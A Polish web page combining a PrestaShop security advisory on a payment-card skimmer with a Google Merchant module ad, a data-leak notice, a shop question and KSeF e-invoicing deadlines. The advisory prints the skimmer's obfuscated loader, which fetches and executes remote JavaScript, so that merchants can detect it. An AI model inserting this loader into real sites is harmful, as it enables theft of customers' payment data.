Niedawno zidentyfikowaliśmy zagrożenie bezpieczeństwa wpływające na niektóre sklepy internetowe w ekosystemie PrestaShop. Wykryto złośliwy skrypt („cyfrowy skimmer”), który mógł spowodować kradzież niektórych informacji o płatnościach Twoich klientów.

Do czego robi ten cyfrowy skimmer?

To złośliwe oprogramowanie działa poprzez zastąpienie legalnych przycisków płatności na stronie kasy fałszywymi przyciskami. Gdy klient kliknie jeden z tych fałszywych przycisków, zostanie przekierowany do fałszywego formularza płatności zaprojektowanego w celu przechwycenia informacji o płatności.

Skimmer jest po prostu ładowany za pomocą tagu <script>, zapisanego bezpośrednio do pliku _partials/head.tpl aktywnego motywu sklepu. Oznacza to, że atakujący był w stanie zmodyfikować jeden z plików sklepu.

Jak mogę sprawdzić, czy mój sklep jest dotknięty?

W recepcji

Możesz sprawdzić swój kod front office, sprawdzając stronę swojej witryny (kliknij prawym przyciskiem myszy, a następnie "sprawdz").

Zajrzyj do wnętrza tagu <script>. Jeśli znajdziesz następujący kod, oznacza to, że Twój sklep jest dotknięty:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Uwaga: Część aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz zmienia się za każdym razem, ale struktura kodu pozostaje taka sama, a funkcja atob() jest zawsze używana. Kod może być obecny przed lub po (skimmer próbuje się ukryć, ponieważ jest nieco inny w każdym sklepie).

Na twoim serwerze

Jeśli wolisz sprawdzać swoje pliki, możesz znaleźć ten sam tag skryptu w pliku na swoim serwerze.

Połącz się z serwerem przez FTP, a następnie przejdź przez folder motywu, a następnie folder aktywnego motywu > folder szablonu > folder _partial > head.tpl. W tym pliku kliknij prawym przyciskiem myszy, a następnie "wyświetl/edytuj" i poszukaj tego samego tagu:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Co powinienem zrobić, jeśli mój sklep jest dotknięty?

Skontaktuj się ze swoją agencją lub wsparciem PrestaShop.

⚠️ Na tym etapie zdecydowanie zalecamy przeprowadzenie pełnej kontroli bezpieczeństwa sklepów PrestaShop i upewnienie się, że żaden z nich nie został naruszony.

Moduł Google Merchant API dla PrestaShop. Automatyczna synchronizacja produktów z Google Shopping, obsługa multi-shop, zarządzanie stanami magazynowymi, cron job, panel administracyjny do zarządzania wszystkimi parametrami synchronizacji. Użytkownicy interfejsu API muszą przejść na Merchant API.
Główne funkcjonalności
Automatyczna synchronizacja produktów
Moduł automatycznie synchronizuje wszystkie produkty z PrestaShop do Google Merchant Center. Każda zmiana produktu - aktualizacja ceny, tytułu, opisu, zdjęć czy stanu magazynowego - jest natychmiast przekazywana do Google. System obsługuje zarówno proste produkty, jak i produkty z kombinacjami (warianty kolorów, rozmiarów, materiałów).

Dwukierunkowa autoryzacja
Wybierz metodę uwierzytelniania dostosowaną do Twoich potrzeb. OAuth 2.0 umożliwia szybką autoryzację przez przeglądarkę z automatycznym odświeżaniem tokenów. Service Account zapewnia bezobsługową integrację idealną dla automatyzacji. Obie metody gwarantują bezpieczne połączenie z Google Cloud.

Zarządzanie stanami magazynowymi
System automatycznie aktualizuje dostępność produktów w Google Shopping. Gdy stan magazynowy się zmienia, informacja trafia natychmiast do Google Merchant API. Obsługiwane statusy: dostępny w magazynie, dostępny na zamówienie, niedostępny. Synchronizacja obejmuje również ceny regularne i promocyjne.

Panel administracyjny
Intuicyjny interfejs w back office PrestaShop umożliwia pełną kontrolę nad synchronizacją. Dashboard pokazuje statystyki aktywnych produktów, błędów i oczekujących synchronizacji. Możliwość ręcznego uruchamiania synchronizacji dla wybranych produktów lub wszystkich naraz. Import produktów z PrestaShop jednym kliknięciem.

System logów
Kompleksowy system rejestrowania wszystkich operacji synchronizacji. Każda operacja jest zapisywana z dokładnymi informacjami o statusie, liczbie przetworzonych produktów i ewentualnych błędach. Historia logów pozwala na szybką diagnostykę problemów. Możliwość eksportu logów do pliku CSV oraz automatyczne czyszczenie starych wpisów.

Automatyzacja przez Cron
Skonfiguruj harmonogram automatycznej synchronizacji dostosowany do potrzeb sklepu. System przetwarza produkty oczekujące w kolejce zgodnie z ustawioną częstotliwością: co 15 minut, godzinę, 2 godziny, 6 godzin lub raz dziennie. Cron job działa w tle, nie obciążając sklepu podczas godzin szczytu.

Obsługa Multi-shop
Pełna kompatybilność z funkcją multi-shop PrestaShop. Każdy sklep może mieć osobną konfigurację z własnym kontem Google Merchant Center lub współdzielić jedno konto. Produkty są synchronizowane osobno dla każdego sklepu z zachowaniem różnic w cenach i stanach magazynowych. Łatwe przełączanie między kontekstami sklepów.

Obsługa Multi-język
Synchronizacja produktów we wszystkich aktywnych językach sklepu. Każdy język tworzy osobny wpis produktu w Google z właściwym tłumaczeniem nazwy, opisu i linku. Dzięki temu Twoje produkty są widoczne w Google Shopping dla klientów mówiących różnymi językami. Automatyczne generowanie odpowiednich URL dla każdej wersji językowej.

Mapowanie pól produktu
Wszystkie wymagane pola Google Product są automatycznie wypełniane danymi z PrestaShop. System mapuje tytuł, opis, link, zdjęcia główne i dodatkowe (do 10), cenę, cenę promocyjną, dostępność, GTIN, MPN, markę, stan produktu, wagę, kategorie Google i własne typy produktów. Inteligentne wykrywanie kategorii i automatyczne przypisywanie taxonomii Google.

Warianty produktów
Pełna obsługa kombinacji produktów PrestaShop jako warianty Google. System automatycznie grupuje warianty używając item_group_id i przypisuje atrybuty takie jak kolor, rozmiar, materiał. Każda kombinacja jest synchronizowana jako osobny produkt w Google z właściwym SKU, ceną i dostępnością. Zdjęcia wariantów są prawidłowo mapowane.

Promocje i ceny specjalne
Automatyczna synchronizacja cen promocyjnych z PrestaShop. Gdy produkt ma aktywną promocję, system wysyła do Google zarówno cenę regularną jak i obniżoną wraz z datą zakończenia promocji. Google Shopping wyświetla przekreślone ceny pokazując oszczędności dla klientów. Zwiększ konwersję dzięki widocznym zniżkom.
https://europasaz.pl/marketing-reklama/154-merchant-api-google-prestashop.html

Doszło do wycieku danych z platformy sky-shop.pl, z której korzystają tysiące sklepów. W efekcie dane z 9000 sklepów trafiły w niepowołane ręce.

Dzień dobry,
Czy jest możliwość stworzenia pakietu promocyjnego  złożonego z 3 produktów. Każdy produkt przeznaczony do tego pakietu  jest produktem z kombinacjami (rozmiary).
Z tego co widzę to mogę utworzyć pakiet  "na sztywno" czyli każdy z produktów ma już wybrany rozmiar, ale w ten sposób tworzy się zbyt dużo opcji pakietu.
Czy może istnieje jakiś moduł, który umożliwi stworzenie takich pakietów?

Daty wdrożenia KSEF dla firm. Dla właścicieli sklepów będzie to 1 kwietnia 2026r.

1 września 2025 r. – wyłączenie środowiska testowego KSeF 1.0 (nowi użytkownicy będą mogli rozpocząć pracę dopiero w środowisku testowym KSeF 2.0 – z dotychczasowego środowiska testowego mogą korzystać podatnicy, którzy pracowali na nim przed 1 września),
30 września 2025 r. – uruchomienie środowiska testowego KSeF 2.0 i start testów otwartego API (chodzi o testowanie oprogramowania służącego do wymiany informacji między KSeF a dostępnymi na rynku programami służącymi do fakturowania – informacja istotna przede wszystkim dla dostawców programów księgowych),
15 października 2025 r. – możliwość integracji z KSeF przez API w środowisku przedprodukcyjnym (wersja demo),
1 listopada 2025 r. – uruchomienie MCU (Moduł Certyfikatów i Uprawnień), który jest niezbędny do pobierania certyfikatów oraz nadawania uprawnień w systemie,
3 listopada 2025 r. – start testów Aplikacji Podatnika KSeF 2.0 w środowisku testowym,
15 listopada 2025 r. – udostępnienie Aplikacji Podatnika przez Ministerstwo Finansów w środowisku przedprodukcyjnym,
wrzesień – grudzień 2025 r. – cykl spotkań organizowanych przez Ministerstwo Finansów „Środy z KSeF”, na których uczestnicy dowiedzą się m.in. w jaki sposób pobierać certyfikaty, jak wystawiać i odbierać faktury w systemie czy też jakie funkcje oferują narzędzia udostępniane przez MF,
26-31 stycznia 2026 r. – przerwa techniczna i wyłączenie KSeF 1.0,
1 lutego 2026 r. – rozpoczęcie obowiązywania KSeF dla największych podmiotów (u których wartość sprzedaży w 2024 roku przekroczyła 200 mln zł),
1 kwietnia 2026 r. – rozpoczęcie obowiązywania KSeF dla pozostałych przedsiębiorców (z wyjątkiem przedsiębiorców nieposiadających stałego miejsca prowadzenia działalności w Polsce jak również przedsiębiorców wystawiających faktury na rzecz osób fizycznych nieprowadzących działalności gospodarczej).

Tryby KSeF – kiedy mają zastosowanie i jak z nich korzystać?
 
Tryb online
Jest to podstawowe rozwiązanie, z którego co do zasady będą mieli obowiązek korzystać wszyscy użytkownicy systemu. Polega na natychmiastowym przesłaniu faktury do KSeF i uzyskaniu numeru identyfikacyjnego w czasie rzeczywistym.

Tryb offline24
Jest to tryb wprowadzony na wypadek problemów technicznych po stronie podatnika, takich jak brak dostępu do internetu czy słaba jakość połączenia uniemożliwiająca przesłanie faktury w czasie rzeczywistym.
W tych przypadkach podatnik będzie miał obowiązek:
wystawienia faktury według aktualnej struktury logicznej,
zapisania jej w formie elektronicznej oraz
przesłania najpóźniej następnego dnia roboczego do Krajowego Systemu e-Faktur.
Jeśli w międzyczasie - między wystawieniem dokumentu a jego wysłaniem następnego dnia roboczego - zostanie ogłoszona awaria KSeF, termin na wysyłkę wydłuży się do 7 dni roboczych.
 
Ważne! Datą wystawienia faktury w trybie offline24 będzie data wskazana przez podatnika w polu P_1, a datą jej otrzymania – moment nadania numeru w KSeF albo faktyczne doręczenie faktury nabywcy (jeśli nie posiada on numeru NIP).

Co istotne, faktury udostępniane poza systemem będą musiały posiadać dwa kody QR – jeden zapewniający dostęp do dokumentu w KSeF, a drugi potwierdzający tożsamość wystawcy.
 
Ważne! Również Faktury korygujące będzie można wystawiać w trybie offline24, ale dopiero po wcześniejszym przesłaniu faktury pierwotnej.

 
Tryb offline
Tryb ten różni się od trybu offline24 tym, że dotyczy czasowego wyłączenia systemu przez administrację – tj. gdy występują problemy po stronie systemu, podczas gdy tryb offline24 dotyczy problemów po stronie podatnika.
W przypadku zastosowania tego trybu podatnik – podobnie jak w trybie offline24 – będzie wystawiał fakturę elektroniczną zgodnie ze wzorem, ale będzie musiał ją przesłać do KSeF dopiero po przywróceniu systemu – najpóźniej w następnym dniu roboczym.
Ważne! W razie awarii termin wysyłki ulegnie przedłużeniu do 7 dni, a przy awarii całkowitej wysyłka w ogóle nie będzie wymagana.

Daty wystawienia oraz otrzymania będą ustalane na takiej samej zasadzie, jak w trybie offline24. Analogicznie podatnik będzie miał obowiązek zamieszczania dwóch kodów QR.
 
Ważne! Co do zasady tryb offline jest tożsamy z trybem offline24; różnią się one jedynie przyczyną ich zastosowania.

Awaria całkowita
W przypadku ogłoszenia awarii KSeF (również w sytuacjach nadzwyczajnych), każdy podatnik korzystający z systemu będzie miał obowiązek wystawienia faktury albo w postaci papierowej, albo elektronicznej, przy czym nie będzie obowiązywał wówczas wzór faktury ustrukturyzowanej.
 
Ważne! Nie będzie obowiązku przesyłania takich faktur do KSeF po ustaniu awarii – dokument pozostanie wówczas wyłącznie poza systemem.
 
Tak wystawioną fakturę (w trakcie awarii KSeF) podatnik powinien przekazać nabywcy innymi środkami komunikacji, np. osobiście, pocztą, drogą mailową.

W odniesieniu do dat, jako data wystawienia będzie uznawana data wskazana przez podatnika na fakturze, natomiast datą otrzymania będzie faktyczne doręczenie nabywcy dokumentu. Również faktury wystawione w trakcie awarii nie będą opatrywane kodami QR.

Co do zasady zatem tryb awarii stanowi całkowite odejście od procedur KSeF, co da przedsiębiorcom gwarancję możliwości dokumentowania transakcji w sytuacjach nadzwyczajnych.

Jak najtaniej wdrożyć KSEF ? Wystarczy zarejestrować konto w Wfirma [koszt na rok około 250zł], użyć integracji PrestaShop + Wfirma. Oprócz poprawnych dokumentów sprzedaży, mamy możliwość wygenerowania JPK, skorzystania z e-paragony i wielu innych funkcji wymaganych przez polskie prawo.

https://europasaz.pl/sprzedaz-logistyka/123-integracja-prestashop-z-wfirma.html